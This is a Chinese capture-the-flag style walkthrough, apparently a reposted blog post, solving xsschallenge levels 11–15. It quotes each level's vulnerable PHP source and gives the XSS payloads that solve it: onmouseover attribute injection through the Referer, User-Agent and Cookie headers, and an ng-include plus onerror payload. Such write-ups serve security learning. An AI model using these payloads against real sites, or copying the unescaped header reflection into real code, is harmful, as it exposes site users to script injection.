当前位置: 首页 > news >正文

xsschallenge通关(11-15)

level 11

老规矩,先查看源码,做代码审计:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现他对关键词、特殊符号都做了过滤,还$str11接收了一个HTTP头部的referer字段,并且输出时没有做处理,用双引号闭合,于是可以对referer进行注入,用bp抓包,然后修改referer字段:

"type="text" οnmouseover="alert(/xss/)

如图:

在这里插入图片描述

修改成功后发包,但是没有事件发生,查看源码后发现小写o被转义:

在这里插入图片描述

重新抓包,将小写o改成大写O,当移动鼠标的事件发生时出现弹窗,通关:

在这里插入图片描述

level 12

查看源代码,做代码审计:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 

发现这关和第十一关类似,也需要抓包,不过将HTTP头部的字段换成了user-agent。

抓包后修改user-agent字段,将o改成大写:

"type="text" Onmouseover="alert(/xss/)

如图:

在这里插入图片描述

放包后通关成功:

在这里插入图片描述

level 13

做代码审计:

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现这一关需要修改cookie字段,步骤和前两关一样:

抓包,修改:

"type="text" Onmouseover="alert(/xss/)

如图:

在这里插入图片描述

放包后通关成功:

在这里插入图片描述

level 14

来到第十四关,什么也没有:

在这里插入图片描述

查看源码,也是没有东西:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>欢迎来到level14</title>
</head>
<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>
</body>
</html>

直接到十五关

level 15

第十五关只有一张图片:

在这里插入图片描述

查看源代码:

<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

发现它接收了一个参数src,并发现ng-include,ng-include的作用如下:

ng-include 指令用于包含外部的 HTML 文件。

ng-include可以作为一个属性,或者一个元素使用

这时候我们可以让这个网页包含一个有漏洞的外部php文件,如level1.php,用onerror事件

?src='level1.php?name=<img src=1 οnerrοr=alert(/xss/)>'
http://www.lryc.cn/news/149403.html

相关文章:

  • Kubernetes技术--k8s核心技术集群的安全机制RBAC
  • 【JavaSE】String类
  • DBMS Scheduler设置重复间隔
  • windows的redis配置sentinel
  • NetMarvel机器学习促广告收益最大化,加速获客
  • Spring-5.0.x源码下载及本地环境搭建
  • go中的切片
  • C++笔记之单例通过GetInstance传递参数
  • 1688API技术解析,实现获得1688商品详情
  • 【Java 动态数据统计图】动态X轴二级数据统计图思路Demo(动态,排序,动态数组(重点推荐:难)九(131)
  • C#将text文本中的单双行分开单独保存
  • 深入理解 Go 语言中的 iota
  • 【力扣】55、跳跃游戏
  • 个人与公司合作,怎么代开发票?有哪些优惠政策?
  • 什么是计算机视觉,计算机视觉的主要任务及应用
  • 网易24届内推
  • redis 应用 4: HyperLogLog
  • 进程的挂起状态
  • idea 链接mysql连不上
  • Ubuntu 启动出现grub rescue
  • go中runtime包里面的mutex是什么?runtime.mutex解析
  • VScode 调试python程序,debug状态闪断问题的解决方法
  • 飞桨中的李宏毅课程中的第一个项目——PM2.5的预测
  • Qt---对话框 事件处理 如何发布自己写的软件
  • 【C++】C++ 引用详解 ⑩ ( 常量引用案例 )
  • React原理 - React Reconciliation-下
  • YOLOv8超参数调优教程! 使用Ray Tune进行高效的超参数调优!
  • JVM运行时数据区
  • 第七章,相似矩阵及其应用,3-二次型、合同矩阵与合同变换
  • css学习7(盒子模型)